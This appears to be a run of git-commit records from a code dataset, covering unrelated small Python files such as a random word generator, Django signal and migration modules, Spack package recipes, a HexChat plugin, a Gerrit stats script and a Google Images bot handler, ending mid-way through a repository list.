if attr in self._copy:
return self._copy[attr]
raise AttributeError(attr)
def show_module(self):
import inspect
print inspect.getsource(copy)
def register(node=None, actor=None):
return Copy()
| apache-2.0 | Python | |
5975fc773b1dff894fbd3f9dcff34c88dd52a17b | Create Random-Word-Constructor.py | jweinst1/Random-Word-Generator,jweinst1/Random-Word-Generator | Random-Word-Constructor.py | Random-Word-Constructor.py | import random
"""A Random Word Generator that uses a built-in algorithm that follows the syllable rules
in the English language. Useful for finding a creative name for a business or app."""
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
vowels = ['a', 'e', 'i', 'o', 'u']
consensnts = [x for x in alphabet if x not in vowels]
starting_letters = ['c', 'd', 'g', 'h', 'i', 'j', 'l', 'm', 'n', 'p', 'q', 'r', 's', 't', 'v', 'y', 'z' ]
class Random_Word_Constructor (object):
def __init__(self, maxlength):
self.maxlength = maxlength
self.dictionary = {}
self.start = [x for x in alphabet if x != 'x' and x != 'u']
self.word = ''
self.word += self.start[random.randrange(len(self.start))]
self.preceed_Vowel_letters = ['b', 'd', 'j', 'w', 'z', 'q']
self.a = [x for x in alphabet if x != 'a' and x != 'h' and x != 'u']
self.e = [x for x in alphabet if x != 'h']
self.i = [x for x in alphabet if x != 'i' and x != 'h' and x != 'u' and x != 'y']
self.o = [x for x in alphabet if x != 'a' and x != 'e' and x != 'i' and x != 'y']
self.u = [x for x in consensnts if x != 'y' and x != 'u']
self.y = ['o', 'a', 'e', 'u']
self.cons_next = ['a', 'i', 'e', 'o', 'u', 't', 'r']
def construct_word(self):
while len(self.word) < self.maxlength:
if len(self.word) >= 2:
if self.word[-2] and self.word[-1] in vowels:
self.word += consensnts[random.randrange(len(consensnts))]
if self.word[-2] and self.word[-1] in consensnts:
self.word += vowels[random.randrange(len(vowels))]
if self.word[-1] in vowels:
if self.word[-1] == 'a':
self.word += self.a[random.randrange(len(self.a))]
if self.word[-1] == 'e':
self.word += self.e[random.randrange(len(self.e))]
if self.word[-1] == 'i':
self.word += self.i[random.randrange(len(self.i))]
if self.word[-1] == 'o':
self.word += self.o[random.randrange(len(self.o))]
if self.word[-1] == 'u':
self.word += self.u[random.randrange(len(self.u))]
if self.word[-1] in consensnts:
if self.word[-1] in self.preceed_Vowel_letters:
self.word += vowels[random.randrange(len(vowels))]
if self.word[-1] == 'y':
self.word += self.y[random.randrange(len(self.y))]
else:
self.word += self.cons_next[random.randrange(len(self.cons_next))]
self.word = self.word[0:self.maxlength]
return self.word
def add_to_dictionary(self):
if self.word[0] in self.dictionary.keys():
self.dictionary[self.word[0]].append(self.word)
self.word = '' + self.start[random.randrange(len(self.start))]
else:
self.dictionary.update({self.word[0]:[self.word]})
self.word = '' + self.start[random.randrange(len(self.start))]
def Random_Word(maxlength): #returns a single random word
word = Random_Word_Constructor(maxlength)
return word.construct_word()
def Random_Dictionary(entries, maxlength): #returns a dictionary of specificed number of entries, and prints them.
word, count = Random_Word_Constructor(maxlength), 0
while count < entries:
word.construct_word()
word.add_to_dictionary()
count += 1
for k, v in word.dictionary.items():
print k, v
| mit | Python | |
f62f8971bcaddc93cf9993e7ff0e4bfd70e0735d | Connect attribute filling signal to profile to dic function. | adieu/authentic2,BryceLohr/authentic,pu239ppy/authentic2,pu239ppy/authentic2,adieu/authentic2,pu239ppy/authentic2,pu239ppy/authentic2,adieu/authentic2,BryceLohr/authentic,adieu/authentic2,BryceLohr/authentic,BryceLohr/authentic | authentic2/idp/signals.py | authentic2/idp/signals.py | from django.dispatch import Signal
from django.conf import settings
from authentic2.idp.attributes import provide_attributes_at_sso, \
provide_attributes_of_user_profile
'''authorize_decision
Expect a dictionnaries as return with:
- the authorization decision e.g. dic['authz'] = True or False
- optionnaly a message e.g. dic['message'] = message
'''
authorize_service = Signal(providing_args = ["request", "user", "audience"])
'''add_attributes_to_response
This signal is used by asynchronous bindings that do not receive attribute
list in the request. That means that a predefined list is defined.
The asynchronous binding means that the user is "on" the IdP to bring the
request then it is possible to take attributes in the Django session.
Mainly, it is usable at SSO request treatment.
The signal is send with parameters:
- request: The request having triggerred a need of attribute
- user: instance of the User Django Model to indicate the subject of
attributes. Maybe different from request.user if any.
- We should here only use a username in case that we want to provide
attributes for entities having no corresponding User instance.
- audience: identifier of the destination of attributes (e.g. the providerID
for SAML2).
The return expected is a dictionnaries such as:
- dic = {}
- attributes = {}
- attributes[name] = (value1, value2, )
- attributes[(name, format)] = (value1, value2, )
- attributes[(name, format, nickname)] = (value1, value2, )
- dic['attributes'] = attributes
- return dic
'''
add_attributes_to_response = \
Signal(providing_args = ["request", "user", "audience"])
add_attributes_to_response.connect(provide_attributes_at_sso)
if settings.PUSH_PROFILE_UPDATES:
add_attributes_to_response.connect(provide_attributes_of_user_profile)
'''add_attributes_to_response
Idem as add_attributes_to_response except that the signal sender gives a list
of attribute identifiers. The attribute namespace is obtained from the
provider to which a namespace has been declared.
'''
add_attributes_listed_to_response = \
Signal(providing_args = ["request", "user", "audience", "attributes"])
'''avoid_consent
Expect a boolean e.g. dic['avoid_consent'] = True or False
'''
avoid_consent = Signal(providing_args = ["request", "user", "audience"])
| from django.dispatch import Signal
from authentic2.idp.attributes import provide_attributes_at_sso
'''authorize_decision
Expect a dictionnaries as return with:
- the authorization decision e.g. dic['authz'] = True or False
- optionnaly a message e.g. dic['message'] = message
'''
authorize_service = Signal(providing_args = ["request", "user", "audience"])
'''add_attributes_to_response
This signal is used by asynchronous bindings that do not receive attribute
list in the request. That means that a predefined list is defined.
The asynchronous binding means that the user is "on" the IdP to bring the
request then it is possible to take attributes in the Django session.
Mainly, it is usable at SSO request treatment.
The signal is send with parameters:
- request: The request having triggerred a need of attribute
- user: instance of the User Django Model to indicate the subject of
attributes. Maybe different from request.user if any.
- We should here only use a username in case that we want to provide
attributes for entities having no corresponding User instance.
- audience: identifier of the destination of attributes (e.g. the providerID
for SAML2).
The return expected is a dictionnaries such as:
- dic = {}
- attributes = {}
- attributes[name] = (value1, value2, )
- attributes[(name, format)] = (value1, value2, )
- attributes[(name, format, nickname)] = (value1, value2, )
- dic['attributes'] = attributes
- return dic
'''
add_attributes_to_response = \
Signal(providing_args = ["request", "user", "audience"])
add_attributes_to_response.connect(provide_attributes_at_sso)
'''add_attributes_to_response
Idem as add_attributes_to_response except that the signal sender gives a list
of attribute identifiers. The attribute namespace is obtained from the
provider to which a namespace has been declared.
'''
add_attributes_listed_to_response = \
Signal(providing_args = ["request", "user", "audience", "attributes"])
'''avoid_consent
Expect a boolean e.g. dic['avoid_consent'] = True or False
'''
avoid_consent = Signal(providing_args = ["request", "user", "audience"])
| agpl-3.0 | Python |
88bb5d1a42b817a000f10ec0989282c0998cc1b0 | Add approved and open | JohnGarbutt/reviewstats,cp16net/reviewstats,openstack-infra/reviewstats,cp16net/reviewstats,JohnGarbutt/reviewstats,openstack-infra/reviewstats | openapproved.py | openapproved.py | #!/usr/bin/env python
#
# Copyright (C) 2011 - Soren Hansen
# Copyright (C) 2013 - Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Identify approved and open patches.
Prints out list of approved patches that failed to merge and are currently
still open.
"""
import optparse
import sys
import utils
def main(argv=None):
if argv is None:
argv = sys.argv
optparser = optparse.OptionParser()
optparser.add_option('-p', '--project', default='projects/nova.json',
help='JSON file describing the project to generate stats for')
optparser.add_option('-a', '--all', action='store_true',
help='Generate stats across all known projects (*.json)')
optparser.add_option('-u', '--user', default='russellb', help='gerrit user')
optparser.add_option('-k', '--key', default=None, help='ssh key for gerrit')
optparser.add_option('-s', '--stable', action='store_true',
help='Include stable branch commits')
options, args = optparser.parse_args()
projects = utils.get_projects_info(options.project, options.all)
if not projects:
print "Please specify a project."
sys.exit(1)
changes = utils.get_changes(projects, options.user, options.key,
only_open=True)
approved_and_rebased = set()
for change in changes:
if 'rowCount' in change:
continue
if not options.stable and 'stable' in change['branch']:
continue
if change['status'] != 'NEW':
# Filter out WORKINPROGRESS
continue
for patch_set in change['patchSets'][:-1]:
if approved(patch_set) and not approved(change['patchSets'][-1]):
approved_and_rebased.add("%s %s" % (change['url'], change['subject']))
for x in approved_and_rebased:
print x
print "total %d" % len(approved_and_rebased)
def approved(patch_set):
approvals = patch_set.get('approvals', [])
for review in approvals:
if review['type'] == 'APRV':
return True
return False
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | Python | |
9bfbf6eb6f65fa745d0ef3777ad4486f47c69b87 | Add pose_to_kml.py formatting script | EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes,EndPointCorp/lg_ros_nodes | scripts/pose_to_kml.py | scripts/pose_to_kml.py | import sys
import csv
from math import sin, radians, fabs
KML_TEMPLATE = """
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2" xmlns:gx="http://www.google.com/kml/ext/2.2"
xmlns:kml="http://www.opengis.net/kml/2.2"
xmlns:atom="http://www.w3.org/2005/Atom">
<Document>
<name>KmlFile</name>
<Placemark>
<name>Placemark 1</name>
<LookAt>
<longitude>{lon}</longitude>
<latitude>{lat}</latitude>
<altitude>0</altitude>
<heading>{head}</heading>
<tilt>{tilt}</tilt>
<range>{range}</range>
<gx:altitudeMode>relativeToSeaFloor</gx:altitudeMode>
</LookAt>
<Point>
<gx:drawOrder>1</gx:drawOrder>
<coordinates>{lon},{lat},0</coordinates>
</Point>
</Placemark>
</Document>
</kml>
"""
def parse(data):
reader = csv.DictReader(data)
for row in reader:
# In all serious GIS lon is X and lat is Y,
# but we messed it up, and print lon as Y.
result = {
'lat': float(row['field.pose.position.x']),
'lon': float(row['field.pose.position.y']),
'tilt': float(row['field.pose.orientation.x']),
'head': float(row['field.pose.orientation.y'])
}
divisor = sin(radians(result['tilt']))
if fabs(result['tilt']) < 1.0:
result['range'] = float(row['field.pose.position.z'])
else:
result['range'] = float(row['field.pose.position.z']) / divisor
return result
def format_kml(data):
return KML_TEMPLATE.format(0,
lat=data['lat'],
lon=data['lon'],
head=data['head'],
tilt=data['tilt'],
range=data['range'])
if __name__ == "__main__":
msg = parse(sys.stdin)
print format_kml(msg)
| apache-2.0 | Python | |
846ce88f199381387f612463da51c6b17281dd21 | Add script for checking Python3 compatibility | google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot,google/skia-buildbot | scripts/check_python3_compatibility.py | scripts/check_python3_compatibility.py | #!/usr/bin/env python
#
# Copyright 2021 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Check for Python scripts which are incompatible with Python 3."""
import ast
import os
import subprocess
import sys
def check_file(fp):
content = open(fp, 'r').read()
try:
parsed = ast.parse(content)
if not parsed:
return False
return True
except SyntaxError:
return False
def check_repo(path):
files = subprocess.check_output(['git', 'ls-files'], cwd=path).splitlines()
incompatible = []
for f in files:
f = f.decode(sys.stdout.encoding)
if f.endswith('.py'):
if not check_file(os.path.join(path, f)):
incompatible.append(f)
return incompatible
def __main__(argv):
if len(argv) != 2:
print('Usage: %s <repo path>' % __file__)
sys.exit(1)
incompatible = check_repo(argv[1])
if len(incompatible) > 0:
print('Incompatible Python scripts:')
for f in incompatible:
print(f)
sys.exit(1)
if __name__ == '__main__':
__main__(sys.argv)
| bsd-3-clause | Python | |
4402506527cbc7dfbf648a90e4e2c665e27a5a34 | Add new package: py-rbtools (#18963) | LLNL/spack,iulian787/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack | var/spack/repos/builtin/packages/py-rbtools/package.py | var/spack/repos/builtin/packages/py-rbtools/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyRbtools(PythonPackage):
"""RBTools is a set of command line tools and a rich Python API for
use with Review Board."""
homepage = "https://github.com/reviewboard/rbtools"
url = "https://github.com/reviewboard/rbtools/archive/release-1.0.2.tar.gz"
version('1.0.2', sha256='dd7aa95691be91f394d085120e44bcec3dc440b01a8f7e2742e09a8d756c831c')
version('1.0.1', sha256='bc5e3c511a2273ec61c43a82f56b4cef0b23beae81e277cecbb37ce6761edf29')
version('1.0', sha256='dbab2cc89d798462c7e74952d43ba1ff1c97eb9c8f92876e600c6520f72454c9')
depends_on('python@2.7:2.8,3.5:', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('py-colorama', type=('build', 'run'))
depends_on('py-texttable', type=('build', 'run'))
depends_on('py-tqdm', type=('build', 'run'))
depends_on('py-six@1.8.0:', type=('build', 'run'))
depends_on('py-backports-shutil-get-terminal-size', when='^python@:2', type=('build', 'run'))
| lgpl-2.1 | Python | |
88d9e6bd216bee0c78f437bdf15362efbebe2e0b | Create new package. (#6504) | mfherbst/spack,iulian787/spack,mfherbst/spack,LLNL/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack,matthiasdiener/spack,iulian787/spack,tmerrick1/spack,iulian787/spack,tmerrick1/spack,LLNL/spack,LLNL/spack,tmerrick1/spack,LLNL/spack,matthiasdiener/spack,EmreAtes/spack,mfherbst/spack,krafczyk/spack,iulian787/spack,matthiasdiener/spack,krafczyk/spack,krafczyk/spack,krafczyk/spack,mfherbst/spack,EmreAtes/spack,tmerrick1/spack,mfherbst/spack,tmerrick1/spack,EmreAtes/spack,krafczyk/spack,iulian787/spack,EmreAtes/spack,matthiasdiener/spack | var/spack/repos/builtin/packages/r-bookdown/package.py | var/spack/repos/builtin/packages/r-bookdown/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RBookdown(RPackage):
"""Output formats and utilities for authoring books and technical
documents with R Markdown."""
homepage = "https://cran.r-project.org/package=bookdown"
url = "https://cran.rstudio.com/src/contrib/bookdown_0.5.tar.gz"
list_url = "https://cran.rstudio.com/src/contrib/Archive/bookdown"
version('0.5', '7bad360948e2b22d28397870b9319f17')
depends_on('r-yaml@2.1.14:', type=('build', 'run'))
depends_on('r-rmarkdown@1.5:', type=('build', 'run'))
depends_on('r-knitr@1.16:', type=('build', 'run'))
depends_on('r-htmltools@0.3.6:', type=('build', 'run'))
| lgpl-2.1 | Python | |
5558cce438134c722a8c96d7d2badc03b6fd45f5 | Create new package. (#6214) | matthiasdiener/spack,LLNL/spack,LLNL/spack,krafczyk/spack,tmerrick1/spack,krafczyk/spack,skosukhin/spack,krafczyk/spack,matthiasdiener/spack,tmerrick1/spack,mfherbst/spack,matthiasdiener/spack,skosukhin/spack,mfherbst/spack,EmreAtes/spack,mfherbst/spack,tmerrick1/spack,LLNL/spack,matthiasdiener/spack,matthiasdiener/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,skosukhin/spack,iulian787/spack,iulian787/spack,skosukhin/spack,skosukhin/spack,iulian787/spack,tmerrick1/spack,iulian787/spack,mfherbst/spack,EmreAtes/spack,tmerrick1/spack,iulian787/spack,mfherbst/spack,EmreAtes/spack | var/spack/repos/builtin/packages/r-fracdiff/package.py | var/spack/repos/builtin/packages/r-fracdiff/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RFracdiff(RPackage):
"""Maximum likelihood estimation of the parameters of a
fractionally differenced ARIMA(p,d,q) model (Haslett and
Raftery, Appl.Statistics, 1989)."""
homepage = "https://cran.r-project.org/package=fracdiff"
url = "https://cran.r-project.org/src/contrib/fracdiff_1.4-2.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/fracdiff"
version('1.4-2', '6a6977d175ad963d9675736a8f8d41f7')
| lgpl-2.1 | Python | |
28c6f1ddc23ee170522b1225bbf60f9b1d244189 | Add new package: logrotate (#18786) | LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack,iulian787/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack | var/spack/repos/builtin/packages/logrotate/package.py | var/spack/repos/builtin/packages/logrotate/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Logrotate(AutotoolsPackage):
"""The logrotate utility is designed to simplify the administration of
log files on a system which generates a lot of log files. """
homepage = "https://github.com/logrotate/logrotate"
url = "https://github.com/logrotate/logrotate/archive/3.17.0.tar.gz"
version('3.17.0', sha256='c25ea219018b024988b791e91e9f6070c34d2056efa6ffed878067866c0ed765')
version('3.16.0', sha256='bc6acfd09925045d48b5ff553c24c567cfd5f59d513c4ac34bfb51fa6b79dc8a')
version('3.15.1', sha256='a7b20f5184c9598c36546f9200d3bd616d561478a0423ab8074e97a1cd7b1c25')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('popt')
depends_on('acl')
def setup_run_environment(self, env):
env.prepend_path('PATH', self.prefix.sbin)
| lgpl-2.1 | Python | |
8fe2be0010e45f6b2ba339f5a7fe350bb7efed42 | add new package (#24045) | LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/py-nipype/package.py | var/spack/repos/builtin/packages/py-nipype/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyNipype(PythonPackage):
"""Neuroimaging in Python: Pipelines and Interfaces."""
homepage = "http://nipy.org/nipype"
pypi = "nipype/nipype-1.6.0.tar.gz"
version('1.6.0', sha256='bc56ce63f74c9a9a23c6edeaf77631377e8ad2bea928c898cc89527a47f101cf')
depends_on('python@3.6:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('py-click@6.6.0:', type=('build', 'run'))
depends_on('py-networkx@2.0:', type=('build', 'run'))
depends_on('py-nibabel@2.1.0:', type=('build', 'run'))
depends_on('py-numpy@1.13:', type=('build', 'run'), when='^python@:3.6.999')
depends_on('py-numpy@1.15.3:', type=('build', 'run'), when='^python@3.7:')
depends_on('py-packaging', type=('build', 'run'))
depends_on('py-prov@1.5.2:', type=('build', 'run'))
depends_on('py-pydot@1.2.3:', type=('build', 'run'))
depends_on('py-python-dateutil@2.2:', type=('build', 'run'))
depends_on('py-rdflib@5.0.0:', type=('build', 'run'))
depends_on('py-scipy@0.14:', type=('build', 'run'))
depends_on('py-simplejson@3.8.0:', type=('build', 'run'))
depends_on('py-traits@4.6:4.99,5.1:', type=('build', 'run'))
depends_on('py-filelock@3.0.0:', type=('build', 'run'))
depends_on('py-etelemetry@0.2.0:', type=('build', 'run'))
| lgpl-2.1 | Python | |
9363331f96805bcc180a081cf9d28b5dab70e25b | Create undoclose.py | TingPing/plugins,TingPing/plugins | HexChat/undoclose.py | HexChat/undoclose.py | from sys import platform
from collections import deque
import hexchat
__module_name__ = "Undo Close"
__module_version__ = "0.1"
__module_description__ = "Adds keybinding to undo close tab"
__module_author__ = "TingPing"
if platform == 'win32':
shiftctrlmod = '5'
elif platform == 'darwin':
shiftctrlmod = '268435473'
else:
shiftctrlmod = '21'
close_history = deque(maxlen=30)
def contextclosed_cb(word, word_eol, userdata):
global close_history
ctx = hexchat.get_context()
for chan in hexchat.get_list('channels'):
if chan.context == ctx:
if chan.type != 2: # Only want channels
return
net = hexchat.get_info('network')
if not net:
net = hexchat.get_info('server')
if not net:
return
chan = hexchat.get_info('channel')
if not chan:
return
close_history.append('irc://{}/{}'.format(net, chan))
def keypress_cb(word, word_eol, userdata):
global close_history
key, mod = word[0], word[1]
if (key, mod) == ('84', shiftctrlmod): # Ctrl+Shift+t
try:
last = close_history.pop()
hexchat.command('url {}'.format(last))
except IndexError:
pass
hexchat.hook_print("Close Context", contextclosed_cb)
hexchat.hook_print('Key Press', keypress_cb)
| mit | Python | |
37cc64eec2681c4a1e8d3ad3c7f5971ce4c0c6e8 | add home view | SimonJakubowski/pyKitty,SimonJakubowski/pyKitty | kitty/views.py | kitty/views.py | from django.shortcuts import render_to_response
def home(request):
return render_to_response('welcome_page.html') | mit | Python | |
f226ab5b8ecd4faa80a349ab033702d716a6864c | Add initial migration | lnhubbell/Timers,lnhubbell/Timers | timer/migrations/0001_initial.py | timer/migrations/0001_initial.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Timer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('seconds', models.PositiveIntegerField(default=0, verbose_name=b'Time in Seconds')),
],
options={
},
bases=(models.Model,),
),
]
| mit | Python | |
e3665928c80da9df192f8edb5dc28e3200e34fdc | Add a "image me [thing]" handler | tgerdes/toolbot,tgerdes/toolbot | toolbot/scripts/google_images.py | toolbot/scripts/google_images.py | import re
import json
import asyncio
import random
import aiohttp
GOOGLE_IMAGE_API = 'http://ajax.googleapis.com/ajax/services/search/images'
def plugin(bot):
@bot.respond(re.compile(r'(image|img)( me)? (.*)', re.I))
def image_me(msg):
asyncio.Task(imageMe(msg, msg.match.group(3), cb=msg.reply))
@asyncio.coroutine
def imageMe(msg, query, animated=False, faces=False, cb=None):
q = {'v': '1.0', 'rsz': '8', 'q': query, 'safe': 'active'}
if animated:
q['imgtype'] = 'animated'
elif faces:
q['imgtype'] = 'face'
resp = yield from aiohttp.request("get", GOOGLE_IMAGE_API, params=q)
data = yield from resp.read()
images = json.loads(data.decode('utf8'))['responseData']['results']
if images:
img = random.choice(images)
cb(ensureImageExtension(img['unescapedUrl']))
def ensureImageExtension(url):
ext = url.rsplit('.', 1)[1]
if ext.lower() in ('png', 'jpeg', 'jpg', 'gif'):
return url
else:
return url + ".png"
| mit | Python | |
fbc5b10b977d20cff340cfb130cec22d49842b5a | Add repos admin | polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon | api/repos/admin.py | api/repos/admin.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from django.contrib import admin
from repos.models import Repo, ExternalRepo
admin.site.register(Repo)
admin.site.register(ExternalRepo)
| apache-2.0 | Python | |
f1189f4774e469e39097e4d10159425a9ed40757 | Bump version to 2013.1 | JioCloud/nova,yrobla/nova,Brocade-OpenSource/OpenStack-DNRM-Nova,virtualopensystems/nova,rajalokan/nova,ewindisch/nova,orbitfp7/nova,sridevikoushik31/nova,cloudbase/nova,klmitch/nova,bigswitch/nova,LoHChina/nova,sridevikoushik31/nova,OpenAcademy-OpenStack/nova-scheduler,devendermishrajio/nova,yatinkumbhare/openstack-nova,thomasem/nova,sacharya/nova,rajalokan/nova,ewindisch/nova,belmiromoreira/nova,maheshp/novatest,rickerc/nova_audit,tealover/nova,vmturbo/nova,double12gzh/nova,JioCloud/nova,cyx1231st/nova,zaina/nova,nikesh-mahalka/nova,isyippee/nova,aristanetworks/arista-ovs-nova,mgagne/nova,ruslanloman/nova,zzicewind/nova,Triv90/Nova,Yuriy-Leonov/nova,akash1808/nova_test_latest,mikalstill/nova,Metaswitch/calico-nova,petrutlucian94/nova,scripnichenko/nova,angdraug/nova,varunarya10/nova_test_latest,vmturbo/nova,fnordahl/nova,zhimin711/nova,citrix-openstack-build/nova,Francis-Liu/animated-broccoli,shootstar/novatest,leilihh/novaha,imsplitbit/nova,zaina/nova,Stavitsky/nova,sebrandon1/nova,SUSE-Cloud/nova,alaski/nova,aristanetworks/arista-ovs-nova,tanglei528/nova,mandeepdhami/nova,BeyondTheClouds/nova,rahulunair/nova,maheshp/novatest,aristanetworks/arista-ovs-nova,ted-gould/nova,viggates/nova,fnordahl/nova,Stavitsky/nova,whitepages/nova,fajoy/nova,mmnelemane/nova,luogangyi/bcec-nova,tangfeixiong/nova,Juniper/nova,projectcalico/calico-nova,redhat-openstack/nova,apporc/nova,rickerc/nova_audit,spring-week-topos/nova-week,cernops/nova,CEG-FYP-OpenStack/scheduler,shail2810/nova,raildo/nova,plumgrid/plumgrid-nova,berrange/nova,klmitch/nova,petrutlucian94/nova,jianghuaw/nova,cernops/nova,bigswitch/nova,barnsnake351/nova,tanglei528/nova,openstack/nova,TwinkleChawla/nova,openstack/nova,gspilio/nova,redhat-openstack/nova,Yusuke1987/openstack_template,cloudbase/nova-virtualbox,akash1808/nova,rahulunair/nova,devendermishrajio/nova_test_latest,jianghuaw/nova,tianweizhang/nova,mikalstill/nova,CloudServer/nova,vladikr/nova_drafts,TieWei/nova,Tehsmash/nova,cloudbase/nova,Tehsmash/nova,sridevikoushik31/openstack,cloudbau/nova,affo/nova,Brocade-OpenSource/OpenStack-DNRM-Nova,nikesh-mahalka/nova,felixma/nova,fajoy/nova,BeyondTheClouds/nova,phenoxim/nova,Juniper/nova,takeshineshiro/nova,JioCloud/nova_test_latest,hanlind/nova,rrader/nova-docker-plugin,vmturbo/nova,iuliat/nova,eharney/nova,badock/nova,akash1808/nova_test_latest,joker946/nova,dawnpower/nova,j-carpentier/nova,NeCTAR-RC/nova,cloudbase/nova,mmnelemane/nova,saleemjaveds/https-github.com-openstack-nova,alaski/nova,alexandrucoman/vbox-nova-driver,gspilio/nova,bgxavier/nova,vladikr/nova_drafts,double12gzh/nova,saleemjaveds/https-github.com-openstack-nova,eonpatapon/nova,alexandrucoman/vbox-nova-driver,CloudServer/nova,TieWei/nova,alvarolopez/nova,eharney/nova,maelnor/nova,usc-isi/nova,barnsnake351/nova,mahak/nova,cloudbase/nova-virtualbox,usc-isi/nova,hanlind/nova,watonyweng/nova,projectcalico/calico-nova,BeyondTheClouds/nova,thomasem/nova,ruslanloman/nova,luogangyi/bcec-nova,kimjaejoong/nova,badock/nova,DirectXMan12/nova-hacking,gooddata/openstack-nova,virtualopensystems/nova,jeffrey4l/nova,jianghuaw/nova,mahak/nova,DirectXMan12/nova-hacking,CEG-FYP-OpenStack/scheduler,tangfeixiong/nova,maoy/zknova,sridevikoushik31/openstack,isyippee/nova,fajoy/nova,maoy/zknova,sridevikoushik31/nova,DirectXMan12/nova-hacking,silenceli/nova,NeCTAR-RC/nova,belmiromoreira/nova,mandeepdhami/nova,ntt-sic/nova,leilihh/nova,shahar-stratoscale/nova,sebrandon1/nova,sridevikoushik31/openstack,edulramirez/nova,jianghuaw/nova,MountainWei/nova,gooddata/openstack-nova,houshengbo/nova_vmware_compute_driver,Metaswitch/calico-nova,maelnor/nova,tealover/nova,MountainWei/nova,phenoxim/nova,silenceli/nova,dims/nova,shail2810/nova,varunarya10/nova_test_latest,yrobla/nova,gooddata/openstack-nova,Yuriy-Leonov/nova,mgagne/nova,felixma/nova,yatinkumbhare/openstack-nova,cernops/nova,cyx1231st/nova,rajalokan/nova,maoy/zknova,sacharya/nova,eayunstack/nova,alvarolopez/nova,Juniper/nova,joker946/nova,spring-week-topos/nova-week,noironetworks/nova,kimjaejoong/nova,maheshp/novatest,Francis-Liu/animated-broccoli,petrutlucian94/nova_dev,yosshy/nova,Yusuke1987/openstack_template,rajalokan/nova,blueboxgroup/nova,dstroppa/openstack-smartos-nova-grizzly,edulramirez/nova,j-carpentier/nova,adelina-t/nova,leilihh/nova,yrobla/nova,orbitfp7/nova,qwefi/nova,mikalstill/nova,JianyuWang/nova,klmitch/nova,leilihh/novaha,CiscoSystems/nova,ntt-sic/nova,JioCloud/nova_test_latest,devoid/n